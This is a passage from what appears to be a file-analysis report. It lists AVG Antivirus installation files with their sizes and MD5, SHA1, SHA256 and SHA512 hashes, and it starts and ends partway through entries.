                                                                                      f353bfe02e30f4fd5cdc89bd7f44703257f229a09f0d815d7794df902f67d1a1

                                                                                      SHA512

                                                                                      279d1e663ecc151dd2dd15462191ef41e668c7a2bfcb7930b8d568facf7695a030948c3af7f9907226b00dede255a7f30169083ae2ce544f2381548db31c9981

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-timezone-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      70f8acde94e2c3952b7ba7f56a4ebfb4

                                                                                      SHA1

                                                                                      955064391f0c9b41362cddbff7a070ab3888ad3e

                                                                                      SHA256

                                                                                      91decddc6e80d742755a1f65261d10c3c0d059aaea6389bb2da6fd3aa7ec5289

                                                                                      SHA512

                                                                                      71087a283d560f08e43b1a183258f1153ab5091d5d318cf4ee0fc8385285592c377d8e68a0f06d3f0be84202aad6dc7376b56057e23b6b3753a445323580f287

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-util-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      d91e6c55a2304aa59d24e76f34884535

                                                                                      SHA1

                                                                                      04ebc0bc4932c09c3dc7d9259fe7c9a6166b7233

                                                                                      SHA256

                                                                                      8875816a3809753c04acd961244608e9a47127523c1d5e50cddbd83a4627821c

                                                                                      SHA512

                                                                                      19c1e2458c5475de2b41013fb18dcf3d149c88c0b3816596b67c90f7bdced3d5214fea97dc3782f56f8a276f93fd28cf519018257bf432c00435ef6bae60a8b9

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-conio-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      a1bee0af7bd944fae7f14174d9dfdffc

                                                                                      SHA1

                                                                                      ea699130cd63857569bf34826b9cbcb5ecfa1a21

                                                                                      SHA256

                                                                                      2c557f6a21db6c99af6184637b5efb57e44b40fae892230a43e96ab05ab27d40

                                                                                      SHA512

                                                                                      c6e9473ec6cdfc0bdd1b8f9f42bdcf3d31855b6e106b811ca52d2eca895328889451726fe12ecaf0af9a238d74c10e79bcf0870f056e7e85ccdb9be49f4515a8

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-convert-l1-1-0.dll

                                                                                      Filesize

                                                                                      25KB

                                                                                      MD5

                                                                                      b9d80efa3f5b0b75c523d4ced4da1fd2

                                                                                      SHA1

                                                                                      f493358454a273d0ddc6467c9ad82bf460dcebc2

                                                                                      SHA256

                                                                                      44ebde7f2681c0b8518e55ca242261b24f326994f089a4ef6c060f8dda04d62d

                                                                                      SHA512

                                                                                      d597c0e7c5309b9631966b01fff7e166c0dd0fc9d63534d588d47f9deee593cb2cf79cd490145aefd472b9493dd65144e875d5870742c8d09fa4c7d459259feb

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-environment-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      6e245fdd89bb6f88f56784adbdca0b0a

                                                                                      SHA1

                                                                                      9ac5d68ff969f984f74e6a8cded8e683b98ffa36

                                                                                      SHA256

                                                                                      0e195a8d013a329a06df877a4569a3ec772f112ad29295f086c6d3e53f322fb5

                                                                                      SHA512

                                                                                      601248c38540dcbddd61fd26203df39ef5d450827570f01cdf0e415873e098913d82ca6e3c7b21a9bcae267b4cb67e970237cbd1c6320b8ffab58c9fb675a3cd

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      e4fcbf91666504c1eb70644dc4c5f479

                                                                                      SHA1

                                                                                      bf96622c082eec928920a052bff477cb0c9e0573

                                                                                      SHA256

                                                                                      58d9a9b2442c10140db98ba705e8c7b7b9ac5a2c030d3286a66debf63b615c1b

                                                                                      SHA512

                                                                                      9dd34f36144010b3c1400ed1b1db8ac8e97997a0d2c803858abeaca75e26d19dc56512714b566edee581ca20c813c3cafd47a3f774a1596b31e23208b1eee4f5

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-heap-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      374d505ced3719d875ac316ce365b1d5

                                                                                      SHA1

                                                                                      24da4d65eb7a9116c626bf16c3bc95b563f10176

                                                                                      SHA256

                                                                                      1edf013e890072987b8957b77baecc37140bc01581e5de6b020ae454bb57f8bf

                                                                                      SHA512

                                                                                      d9b82d1679afd85c660ea985d6f57cc13fd35b4d7b8104c6d9ce1f182789b615a573b68d5f1da6c25682cb35068ae0aad3c1c9b4509f339fa1a83a9eeb7f74ca

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-locale-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      152925be0e3a0ff77b0979bcae7a7583

                                                                                      SHA1

                                                                                      4ac4bb649b42893a8d5ba345a1c92ab2ddd1ddde

                                                                                      SHA256

                                                                                      2e23b53441ba6b0779b222c120d44eb9a156d55cc3648f76216017ef06f9a16f

                                                                                      SHA512

                                                                                      17b41057b82b1eb037a59715970496d402ac00a59fcbe67245203f117fc38f1b7e7f5b78872850ac4fd7a5dcf4a3ec561dfdb3fb0e827ec7043978b535e9ee26

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-math-l1-1-0.dll

                                                                                      Filesize

                                                                                      29KB

                                                                                      MD5

                                                                                      bf69d049653e504a7a1f8b55a6dde7bc

                                                                                      SHA1

                                                                                      737a1cbf1fddc0ae93a0a99d2feddd474f4b85bf

                                                                                      SHA256

                                                                                      e6e839c6d205f91adaa3d980f843bab3131b8a25e06d152d0f70a6e98fbe0fb0

                                                                                      SHA512

                                                                                      a8d834d46fcaf03aa53bd48b4cec816e0fd599b06b16a14006e402bfaa5a470f47dc6a55c1a94314d635af55ff2322eb242b0c535a02fc830dac83e375adc6a2

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                                      Filesize

                                                                                      29KB

                                                                                      MD5

                                                                                      4847091828ad3b0734418343c712cffe

                                                                                      SHA1

                                                                                      24e69b32dba65631b92493b7aabd68d141cf21e3

                                                                                      SHA256

                                                                                      d9388848ebfe27138998518332bb507e5dbeb1d8851e9ed0300f15e14b6958c2

                                                                                      SHA512

                                                                                      5e8061cc226f3471e3964c04cdc5fbd3a607c9abd22a11a1e818eaec42b20ae873fa80cfce7f47b8f8844f3127ce98282c737f25666d20ded47704e0db6f29e3

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-private-l1-1-0.dll

                                                                                      Filesize

                                                                                      73KB

                                                                                      MD5

                                                                                      533b418afd2ef8e423f42d414cdaf5ef

                                                                                      SHA1

                                                                                      09d3a595bad8f0e7ab5604fc02ef832d11a26b88

                                                                                      SHA256

                                                                                      66f910721f4477ea238603e5c14c858d1e26fc2ceaab3b48294cac069790202c

                                                                                      SHA512

                                                                                      eb73c82a91ce67f8d0265ac4f0739849e5696ec0069ab6508660368b8d382a230dc88eeb89aacf8bc9fc6b7e31c009521fdeeb979f4ebe6e80cfec083129ccf1

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-process-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      dc3fe259a9b778480c2405fdd7405c9c

                                                                                      SHA1

                                                                                      d28a588217738af932fc43b809add215eb932856

                                                                                      SHA256

                                                                                      b33a762f0eb072033044e7ee89505b695f357c958d4107ce6f1c4d68f88d3277

                                                                                      SHA512

                                                                                      54f58f5a0d1aecfb9a6c8f12b5aac30e26ec427dccc097f8015d690a0a2244603e80810c19fb8eb2ee7ae9122d14829b3aaa81c69c77b6b4c5751d040c3849f7

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                      Filesize

                                                                                      25KB

                                                                                      MD5

                                                                                      80e80532239aa8929ec0fddedb7aa8af

                                                                                      SHA1

                                                                                      312e743535e66735d782cbaffacf94c6c791edab

                                                                                      SHA256

                                                                                      d3641bbaeaa5a7e7d4ee0ee0ec64ccee0327cfba3d10b89094144eb70a0867a9

                                                                                      SHA512

                                                                                      87e7a5496bb2dfb9bed4e9b9913db2656b335b916eb1277ebebc33ac9d6622bed50a22293dcc02193f846be5e0b4b0f032dfbcc673955aa90f04cf81b47a9305

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                      Filesize

                                                                                      25KB

                                                                                      MD5

                                                                                      58a8c2d2404ad7bf6fca8bdfbb8a5b3b

                                                                                      SHA1

                                                                                      6e834364437bfd23b48e66d8d891966860528d08

                                                                                      SHA256

                                                                                      eb7851e182a4675bb34633869938ff3579779a92a6c094194efbc970f3765dcc

                                                                                      SHA512

                                                                                      d44e3b47dabd29621a3fadaed16074a46b646e1190ffcfffb7ec835b8cd6eefac88570812e41a490daae485a1d71fb2d035c91e73b65c2fbde649fda8733ceb9

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-string-l1-1-0.dll

                                                                                      Filesize

                                                                                      25KB

                                                                                      MD5

                                                                                      d7164ae82b7332432bf2eb7fc7774e72

                                                                                      SHA1

                                                                                      221d79c77a8a80068621a0eb8688ddb86224408c

                                                                                      SHA256

                                                                                      08d811ff57efe50d9f365c76ec29e095474e0679e06bb4d0d4d0134b0120b40d

                                                                                      SHA512

                                                                                      d1a4cfc0a21509382606f4650a67556b0616283231e71bb1870ccaa5deba42fd77583c3130d60d632e98f5acc4763f57a2ed932aa2eeef49601618761acd9429

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-time-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      6aa7b1323c5d8e314f2fb42f855e9b12

                                                                                      SHA1

                                                                                      044cd0167de5e9c1b014e07287c90473c96944a5

                                                                                      SHA256

                                                                                      9c5880c395b4e7db4b8d6de49c75909abdaeeef0b041c1703c7339b05d7d2866

                                                                                      SHA512

                                                                                      e99a14c8772662dbabcaa504bc61ef616590bb6f7384adf8ae0637e0a365f94c67fe4222b978605b7a2eeeaa62505e57c32857b17b51f4b2e9a0d8a033f0a204

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-crt-utility-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      7b7f4484966036ff86a7e4cd303d3871

                                                                                      SHA1

                                                                                      18a789e9d1e9df0fdf22e94d71a18c483cdeb611

                                                                                      SHA256

                                                                                      7d3d88332d4744c9b6be81e2ba8d42ced7657ce7879a26f5b8a8d3bb2331ada0

                                                                                      SHA512

                                                                                      39e986994a99361fadcccbf5bd861ce9c4c6de65ce5e3da4d390b234fff34d7c561637ec012ccdb2757794adc222bc80de19a60a8917fe65fc221fdb3054149c

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\avg.local_vc142.crt.manifest

                                                                                      Filesize

                                                                                      27KB

                                                                                      MD5

                                                                                      b5dc4cd84e001abaf9167d3970a5300f

                                                                                      SHA1

                                                                                      612bf55fd5a43b7da96268a541148bdf3e0ef333

                                                                                      SHA256

                                                                                      5cbc4bdfc8ae2b5e9d2ecd8370dc50123b9e6a7870ae6e0ea4c937d8ed6890f2

                                                                                      SHA512

                                                                                      44ebdd8956aa027985be8a58ebce8badfb039a563dfc333b6d1743c6316834444851a065c9d73830a90362027ec7cbfd3df3cc51dfb2b8ca9e79a7f930daebda

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\concrt140.dll

                                                                                      Filesize

                                                                                      315KB

                                                                                      MD5

                                                                                      e6d7ff1c7c1311a9011f1039639adc3d

                                                                                      SHA1

                                                                                      d47faf7b6f8af8ed67546e75693200d022ebeccd

                                                                                      SHA256

                                                                                      993af3de5e1fe2e3d0954cf06254fabb91a5a3aa513183fe0841b897eafdaeee

                                                                                      SHA512

                                                                                      35eae324dc30a6bf652cf571daefa8d34d12c09361b248d8931ce721940347ed50a2d51222adaa655abbf9c5a0ab58d57cd91cb1cb26dabd487ed721790378eb

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\msvcp140.dll

                                                                                      Filesize

                                                                                      559KB

                                                                                      MD5

                                                                                      ebf8072a3c5c586979313f76e503aabf

                                                                                      SHA1

                                                                                      2fd9609f099a8f42b1b7ae40ad35be1569c0390e

                                                                                      SHA256

                                                                                      a030dc2dfd2eca28a9375c92989adf4daf161f988db5e16b9e10678eb0dff4c7

                                                                                      SHA512

                                                                                      438c2db953606818b843e42c04240d510b5e398617e8e5539498264f93cf1893ae9a6b6b02ee35b169ae60b0e3b5621d7d9f7e2945d0f1e7c2e7e0c1e9e3c1de

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\msvcp140_1.dll

                                                                                      Filesize

                                                                                      35KB

                                                                                      MD5

                                                                                      11d5d26552c1730ccc440f13a1fce188

                                                                                      SHA1

                                                                                      4c534eb613cb05455809b6471d38e1e0976aa919

                                                                                      SHA256

                                                                                      edfbcb2ced712f23842525cb076ee2c09cc7b811a389cf37922d04ef1985e10f

                                                                                      SHA512

                                                                                      2428c4257ac8349035ebb286dec236a25acdbf23178aaa80fd5461b2ed3101c0a67574bf7db8728d0c101d92f45dc72e7bc578049d5b18fac367bdfb44ecfbf2

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\msvcp140_2.dll

                                                                                      Filesize

                                                                                      261KB

                                                                                      MD5

                                                                                      718e5c4a63d2f941eeb1b4e9d6d85a8c

                                                                                      SHA1

                                                                                      deca5196d35d43c7abb35d9ad4b0ac0756585fd9

                                                                                      SHA256

                                                                                      f3117e3445945a872a35e91371e2a6c9f7b3fa5e74e5985f6ab12ac101b280fe

                                                                                      SHA512

                                                                                      61694ff307bcf3869dc14dac45e74b0cdd5a661d40e8483cfe96debe4727ec45ceef867d18e972d25a6b294c43ba0569562392b6752e068f2ba7c15407fad975

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\msvcp140_atomic_wait.dll

                                                                                      Filesize

                                                                                      49KB

                                                                                      MD5

                                                                                      f9c7a19dfc5fa60b1405c81208bd959b

                                                                                      SHA1

                                                                                      4eb70df0a412d79fbd8011fa17ef815e10189c0d

                                                                                      SHA256

                                                                                      2f9cdd965650440cebaf2349140a7dde9b587829b7753de8cd051933a777f499

                                                                                      SHA512

                                                                                      2ea1e4d7d63af427a0c764b4a9a646421dac1f1eba15c1d43bd040b284fc611c8059d889c48edfca56e745abb996939d8f430ff3e249a5c6455e81b520307a55

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\msvcp140_codecvt_ids.dll

                                                                                      Filesize

                                                                                      31KB

                                                                                      MD5

                                                                                      0f4e5f6c68c514e63c4cdae9eb9e40f5

                                                                                      SHA1

                                                                                      b755c91cb14e9f22c690209d0b4c3661ab20770d

                                                                                      SHA256

                                                                                      945225e01a65e5199aa7372b893da3b42dbd99f315c345f0e7c136af88e897ef

                                                                                      SHA512

                                                                                      8962e7f92446c535151b38a7e34bacbfb9f0f48ab57d4c2c8f2162dc2f1cd9f15be70742032192b41aa368c97a149e1e6fa6991e29077b7b7d7c1708f1a54f9b

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\ucrtbase.dll

                                                                                      Filesize

                                                                                      1.1MB

                                                                                      MD5

                                                                                      932dcb8d7d06f4b89fc3915726c418b7

                                                                                      SHA1

                                                                                      33a1fdbfc3dfa0a1b7d2fa3b2e8bad8e8c71e961

                                                                                      SHA256

                                                                                      a73bd7d75f368ab2fe949dcddbb25cd5d5975ff9091761a01b98f5e26de543ee

                                                                                      SHA512

                                                                                      fa24b5f9a4192fbfe737506899dc052c51f48980992cbdda878deef01ed0280ca455bed0c813089503da3ccac92a0289dd8fdfe64cbf6babdf70d7bab531540d

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\vccorlib140.dll

                                                                                      Filesize

                                                                                      340KB

                                                                                      MD5

                                                                                      22a66d8309244779b8a7f275a3ff5cbb

                                                                                      SHA1

                                                                                      195e58fec7a5d39fe7a6275dac37295777da1352

                                                                                      SHA256

                                                                                      aca79a9c1f6d664d99691fd0d3d84a8819993f784b2ff6d7baf8e8ab2e15e7b0

                                                                                      SHA512

                                                                                      b39eacf78b9b97d968e96e357725bd6cbad7592beef5e0e5b301189cc76847be49f8a5299a16d68bd5c1c2d0e86d5263f865b29b66df8360cb1d4725b7b00ac2

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\vcruntime140.dll

                                                                                      Filesize

                                                                                      116KB

                                                                                      MD5

                                                                                      699dd61122d91e80abdfcc396ce0ec10

                                                                                      SHA1

                                                                                      7b23a6562e78e1d4be2a16fc7044bdcea724855e

                                                                                      SHA256

                                                                                      f843cd00d9aff9a902dd7c98d6137639a10bd84904d81a085c28a3b29f8223c1

                                                                                      SHA512

                                                                                      2517e52f7f03580afd8f928c767d264033a191e831a78eed454ea35c9514c0f0df127f49a306088d766908af7880f713f5009c31ce6b0b1e4d0b67e49447bfff

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\vcruntime140_1.dll

                                                                                      Filesize

                                                                                      48KB

                                                                                      MD5

                                                                                      9410ee0771ff1c2007d9087a8c316a4b

                                                                                      SHA1

                                                                                      3f31b301b5a99a13486ddec08d25646d5ad510db

                                                                                      SHA256

                                                                                      e4e85eea1106d361923995e53a0b961a28d4fb58555f40945003f35e5bf2c273

                                                                                      SHA512

                                                                                      434a32ca6c4fdd8ffeb45d1bdb4d9f3c1b1259a1260ae66eb241f8bd63524cd1a3ec29d5eefa2d2f266dd740273e69b6bb8a7771badb77e781dc789dc18de2c9

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\vcruntime140_threads.dll

                                                                                      Filesize

                                                                                      37KB

                                                                                      MD5

                                                                                      268036dfa28320d2186b9b21631d443d

                                                                                      SHA1

                                                                                      96fa44f2214af9ede1160e043c7cd31b890b437a

                                                                                      SHA256

                                                                                      edb3ff7cef28496d535e40769625e542dd3e13110c38ce2e3dc1caa8687b892a

                                                                                      SHA512

                                                                                      99ce4bc5798320dd7f736725eb85a98553e277ab93353e1675fb7842bd258bb408a5df7bc530a161d91c1eccfcb510138f98085a80e892c3f54e2e8a723bb841

                                                                                    • C:\Program Files\AVG\Antivirus\avgToolsSvc.exe

                                                                                      Filesize

                                                                                      1.2MB

                                                                                      MD5

                                                                                      c835a80ce521776fc04baf534702cc5f

                                                                                      SHA1

                                                                                      f806ae2d083ec7843c5f22f1cbfbb1970c58a893

                                                                                      SHA256

                                                                                      7a4e0ffff9c9cd35f7bc93d8c5404ffb15e365862233d0a8e3f8bae60a659c93

                                                                                      SHA512

                                                                                      26a468135d478c5c6b64e1d3c3e86f519e198f3ad34cfa17808dc83214c254693c7166ad142ebbb7a09c09aef71ae2cc69e996b7f9c09d5f601fbc55bc3e666e

                                                                                    • C:\Program Files\AVG\Antivirus\browser_pass.dll

                                                                                      Filesize

                                                                                      689KB

                                                                                      MD5

                                                                                      1f9fa56607d8443497e6e9300fca653e

                                                                                      SHA1

                                                                                      20213161b67e354ee976026deaa6de4fc906624b

                                                                                      SHA256

                                                                                      2ea97fb1d9b24997c60a8547afc57cfbbd2514e7f4d3237f5ed470abe1bdeb42

                                                                                      SHA512

                                                                                      b47c8cfe83dccfb5036951b664a08878dbd4caa2537d5d2899242cbd88ecfae94d91c65f7c33546ece2a976b5352a3d83a8ae8e517978ea6335a37b613ee4fa9

                                                                                    • C:\Program Files\AVG\Antivirus\burger_client.dll

                                                                                      Filesize

                                                                                      1.8MB

                                                                                      MD5

                                                                                      5b066b9475f21d4486be92f8c59c9348

                                                                                      SHA1

                                                                                      7c73d5921f4bb04e7bbc7d05d99d223fc86e20e7

                                                                                      SHA256

                                                                                      9382cf4297c001d1c64da36accfbddc09333a03100d9245183a06913fad293bb

                                                                                      SHA512

                                                                                      dc615fe58472ee210ca9d9e3ae0e622dd600a04a04d4400cec603386b4864de453d6c593d1d1f6cf4f7b84e258949a3d303eb7adb0df7f28efed1afc3d608188

                                                                                    • C:\Program Files\AVG\Antivirus\chrome_100_percent.pak

                                                                                      Filesize

                                                                                      768KB

                                                                                      MD5

                                                                                      8ebb97efd9cc5bd6c500ef6c7a9fa406

                                                                                      SHA1

                                                                                      8e285f1ffd650c87dc4a0ec26df418acc1fc8821

                                                                                      SHA256

                                                                                      aaaff8d6c9f0307c4eb3dda812f566300073414de002bcefb273a7be57f9e69e

                                                                                      SHA512

                                                                                      f93b72eb950d924b66bdd44713b631409003feef26f6146ef366f05312459ba2d2c4c720b3ad13594c8ee6c3734c53e4d1295eea064c03be313ae2f541105c89

                                                                                    • C:\Program Files\AVG\Antivirus\chrome_200_percent.pak

                                                                                      Filesize

                                                                                      1.3MB

                                                                                      MD5

                                                                                      8f6d29ec5f29c02e8d7188366f0ef3ae

                                                                                      SHA1

                                                                                      7451e3cc4a7de1a53987c5cadf2a759269d99a40

                                                                                      SHA256

                                                                                      3e116ffe2f55faa2c2b96aee4da637e6424cb48bab27d9f94a958530f840c673

                                                                                      SHA512

                                                                                      418be962c4dcf92423b2bb780d3a7476756e16aa1b670167ed3631bbf7ad4edb1d35a04c5f8f685c5eb79edfe5a247403d25c6ef18f43eadf1192603ddb2b386

                                                                                    • C:\Program Files\AVG\Antivirus\chrome_elf.dll

                                                                                      Filesize

                                                                                      1.1MB

                                                                                      MD5

                                                                                      39a3d833e0e786905fc8b3bf153989a5

                                                                                      SHA1

                                                                                      716c1968740c69d9e5639a72aaac709eb2e0024e

                                                                                      SHA256

                                                                                      d0447e595d85098fecc0e0bfa51c93506f9e218ed10d0a916ee0bfef511ac0df

                                                                                      SHA512

                                                                                      85896f4a58a66317ee67319e1d68269aba84fa81e8a5833f88b55a52f705f6516a27a50afb55baa4735a9736c01d90ab2a2ff71869dc8f5524ea6d2a6e297ab4

                                                                                    • C:\Program Files\AVG\Antivirus\crts.cat

                                                                                      Filesize

                                                                                      130KB

                                                                                      MD5

                                                                                      477255e0a760041d38c98bccb99a403d

                                                                                      SHA1

                                                                                      2bcdb96bbe2dbb6d85db7cf50d0345b72959ad00

                                                                                      SHA256

                                                                                      d4113f0402d704e9a0ad29e696e4d142838c0c5f0ac349c6e9af106890528e97

                                                                                      SHA512

                                                                                      0564fcddf1d01925ae7d8ff93f338f197b67994efd9f7ee39bc5ee0d09b72c29054bdca198b03e873572dc9b07cafff96bba31da3828caa78728b2bf2c005c89

                                                                                    • C:\Program Files\AVG\Antivirus\d3dcompiler_47.dll

                                                                                      Filesize

                                                                                      4.1MB

                                                                                      MD5

                                                                                      f192b3b5ee05bdb0afe890a09f69abdd

                                                                                      SHA1

                                                                                      b2194d97f7a25348eeb714552c89a29a75165613

                                                                                      SHA256

                                                                                      901c70df9b9714b22d264375bf5c91ef469edafc25c6762e7b0112bea6f07378

                                                                                      SHA512

                                                                                      9ab70152cf0e3214d539a59b135f95485fd770d0c5693469045a8e3e70e48b5d1f7c2dc690b2f7eb9094cf2377199624890f2f0789b2abf81393cb2b5765780b

                                                                                    • C:\Program Files\AVG\Antivirus\dll_loader.dll

                                                                                      Filesize

                                                                                      161KB

                                                                                      MD5

                                                                                      6b012b0690e2ee575ee3e3629553bea8

                                                                                      SHA1

                                                                                      760628d0cdb3cc334a2e419e9a234ba9898db532

                                                                                      SHA256

                                                                                      7cabc8c87709047706952e2888898c37d9d9b0a91c7572e1b1003a37119c1647

                                                                                      SHA512

                                                                                      7c302e80da63df5666c555428f70818a640ecd610f5bbf142b5fa454be3f9124cddc950e3c3d2e378d753f76c9ce256ceb790f3c865108c79f00107689f4ea9d

                                                                                    • C:\Program Files\AVG\Antivirus\dnd_helper.dll

                                                                                      Filesize

                                                                                      906KB

                                                                                      MD5

                                                                                      c04e6b9be84d46c9ca6fdea6072d396d

                                                                                      SHA1

                                                                                      ae8e20d5fb8eec615dc0f87979138f1147c7ea8e

                                                                                      SHA256

                                                                                      b4be6ca1a5a31bc0c9023c562142cddf983747624f3bb750b1d5f4a8d6fd4af3

                                                                                      SHA512

                                                                                      d934dad3459908fecc48d8d3f0c3e523e8651d8ab8459dd9428f9c9c84b84742a8da236f095c64571eb3b52888604ba9e4095810b1f5b7e4d88d8d82e472f936

                                                                                    • C:\Program Files\AVG\Antivirus\event_manager.dll

                                                                                      Filesize

                                                                                      570KB

                                                                                      MD5

                                                                                      90eaf9b33d986a0da79b538e8c0dc62e

                                                                                      SHA1

                                                                                      fab3fa763252ea69e5b36797e69c064e590d3169

                                                                                      SHA256

                                                                                      02d973546a354c1e1e0a0ca5654cf167a611e70daa909c876437a97a95f84353

                                                                                      SHA512

                                                                                      d211ef731b187ffc0e4bea523da005a341b5123a9c954aa8f9c4de9fbf4172b03f8e67545673ffdd03f99329c954b6359998d528afed5904905b1c7c18b5ffec

                                                                                    • C:\Program Files\AVG\Antivirus\event_manager_burger.dll

                                                                                      Filesize

                                                                                      590KB

                                                                                      MD5

                                                                                      bde86bd3aa1797531ba0f96bbc936f53

                                                                                      SHA1

                                                                                      37f85aacd87af33004d75f1b6afe5b79f055fb9f

                                                                                      SHA256

                                                                                      69b733b82f533e3b37589a7ce2432cbfbc7939866e4e8888881f97154ad5bafc

                                                                                      SHA512

                                                                                      d7d8fc744b199b4e98dff5775603ed8a1b29af9e8586314ed5b103b0182d45632eaefa131155a50c067ec53049500730954cc58803ffdfa280fd46c4b88d17d1

                                                                                    • C:\Program Files\AVG\Antivirus\event_manager_er.dll

                                                                                      Filesize

                                                                                      383KB

                                                                                      MD5

                                                                                      66006306ca9565286e6f752ba3a0eaab

                                                                                      SHA1

                                                                                      f507d95ee7e5af88c5ae70b3a250fd4e30d6e1d5

                                                                                      SHA256

                                                                                      7373a700fbe52b7b3f3c255eebdc3ce103f1ebb38302d2b17c5a34da787969c0

                                                                                      SHA512

                                                                                      aa0702970e466c77c111ecbc770f77cfca906897ada34bc0b6e135617b1494a5dd02ef4bdb61acb1e1d57fa72c05a61491bda64b407e3579e2f2ae23d56bc647

                                                                                    • C:\Program Files\AVG\Antivirus\event_manager_ga.dll

                                                                                      Filesize

                                                                                      1.2MB

                                                                                      MD5

                                                                                      712ce010b9d2f8a2d0f2d418d1931a67

                                                                                      SHA1

                                                                                      8d1247b0857a540e7e760bc9e3ac1704642438f9

                                                                                      SHA256

                                                                                      fe547117cb41d39b1f8d11792a3c73d96d66716382c39dffd77f69a9505586d9

                                                                                      SHA512

                                                                                      1f033624e75b0123b99a4e34111e2ec41ec90b22ebd129af067b65f79cbdc369ebf8c3e493286bca5f1006171c47d2c45f66a4c13afc2f8ce096267fa1569499

                                                                                    • C:\Program Files\AVG\Antivirus\event_routing.dll

                                                                                      Filesize

                                                                                      752KB

                                                                                      MD5

                                                                                      2e21c021e95829748706c7eaa75b47db

                                                                                      SHA1

                                                                                      2b833dd5411aaa1fc311dbd25dd5038f0c23daa2

                                                                                      SHA256

                                                                                      b1ed273cc6f2cf0734d2de979d822acef0b476a3d30acebafa2e3cc3db5ed58f

                                                                                      SHA512

                                                                                      f6e1146bcf4fba43c22ed6941590b06825705666e93a80fe226b16af0c88b35dcc1e3847f5ca7d85dea091fce50abce204d2f587a9db6b5a76c33a5e508f1d43

                                                                                    • C:\Program Files\AVG\Antivirus\event_routing_rpc.dll

                                                                                      Filesize

                                                                                      1.2MB

                                                                                      MD5

                                                                                      36eec63a4ec790ab2047f9b897b61e9e

                                                                                      SHA1

                                                                                      5170d028377dd81709f3e81e3583b82373c73e97

                                                                                      SHA256

                                                                                      511b34e8bb40336a14e99e620b40b7eebac0e6f8ff5a2422e0e29442f1303eb7

                                                                                      SHA512

                                                                                      ac3b5b3abe63e8043f05aa985a83db947c10ce8f99790342b2794d2b50f83f81b59890f7952d63842287f57f232803225fc3a193383914db8e424c2c2e126050

                                                                                    • C:\Program Files\AVG\Antivirus\ffl2.dll

                                                                                      Filesize

                                                                                      1.5MB

                                                                                      MD5

                                                                                      e4825f0ba27d8bba9f515e3d0a32549b

                                                                                      SHA1

                                                                                      4d4d74ba483dbed2f54a6c941aa2c5fa9280c694

                                                                                      SHA256

                                                                                      110e53c1ac7c74d5bd84c5e3f94c73b0dea5e598c0983de71d45822dbd0a601d

                                                                                      SHA512

                                                                                      1f0c259bd168d9f8a1203998ef2d0e6737d17915049e42854887e915432c358b924a94f0da6aec2990dd789afba107a2fa3b40a486547f9d947643941a15d58a

                                                                                    • C:\Program Files\AVG\Antivirus\firefox_pass.exe

                                                                                      Filesize

                                                                                      565KB

                                                                                      MD5

                                                                                      6818b12dd129fd3d4c571045d83459a5

                                                                                      SHA1

                                                                                      9dec68fcf78f670f6fad811444033b90bc0770aa

                                                                                      SHA256

                                                                                      172a247bf43b0c303d695e0aa00ac60e23a08b9d2c29d6a1b8836c200d23ab15

                                                                                      SHA512

                                                                                      0fb9642c928d84ade9a0f365df2da6ef489b2c36fc08ba845fee1d63e2d0022622bc39c5ad217028f01044efffed6e18b9ded92ad01c24765352b874e3133adb

                                                                                    • C:\Program Files\AVG\Antivirus\fltlib_wrapper.dll

                                                                                      Filesize

                                                                                      354KB

                                                                                      MD5

                                                                                      df29e6e30fedb2eb6dc118ebaffe8c79

